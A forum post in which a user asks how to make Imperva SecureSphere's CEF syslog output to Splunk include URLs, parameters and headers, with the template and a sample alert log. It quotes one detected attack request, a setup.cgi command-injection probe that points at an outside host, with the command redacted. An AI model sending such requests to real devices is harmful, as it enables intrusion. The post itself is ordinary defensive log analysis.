hello?
I'm sending detection events from securesphere to splunk using syslog.
The syslog settings are:
CEF:0|Imperva Inc.|SecureSphere|${SecureSphereVersion}|${Alert.alertType}|#cefEscapeMessage(${Alert.alertMetadata.alertName})|${Alert.severity}|act=${Alert.immediateAction} dst=${Event.destInfo.serverIp} dpt=${Event.destInfo.serverPort} duser=#cefEscapeExtension(${Alert.username}) src=${Event.sourceInfo.sourceIp} spt=${Event.sourceInfo.sourcePort} proto=${Event.sourceInfo.ipProtocol} rt=#arcsightDate(${Alert.createTime}) cat=Alert cs1=#cefEscapeExtension(${Rule.parent.displayName}) cs1Label=Policy cs2=#cefEscapeExtension(${Alert.serverGroupName}) cs2Label=ServerGroup cs3=#cefEscapeExtension(${Alert.serviceName}) cs3Label=ServiceName cs4=#cefEscapeExtension(${Alert.applicationName}) cs4Label=ApplicationName cs5=#cefEscapeExtension(${Alert.description}) cs5Label=Description
|
The logs received from splunk are:
10.10.10.10 CEF:0|Imperva Inc.|SecureSphere|13.6.0|Protocol|Illegal Parameter Encoding|Low|act=None dst=20.20.20.20 dpt=80 duser=n/a src=45.146.165.129 spt=53387 proto=TCP rt=2023/01/21 17:51:05/08/30 14:48:37 cat=Alert cs1=HTTP/1.x Protocol Policy cs1Label=Policy cs2=Server_Zone_2 cs2Label=ServerGroup cs3=Service_Zone_2 cs3Label=ServiceName cs4=Default Web Application cs4Label=ApplicationName cs5="Multiple Nuclei Scanner(+)" cs5Label=DescriptionWhen analyzing an attack, this information is sometimes lacking.
Actually securesphere logs more information like url, parameter, header.
GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=[attack command]http://30.30.30.30:45537/~~~~ HTTP/1.0If the above information were included in the syslog, the analysis would be much more helpful.
I wonder if such a setup is currently possible in securesphere.
If I can't do it via syslog, is there another way? Exporting the detection log to csv did not confirm this information.
I look forward to your reply.
thank you.
#On-PremisesWAF(formerlySecuresphere)------------------------------
Seungyeon han
ceo
Yeungnam University College
Seoul
------------------------------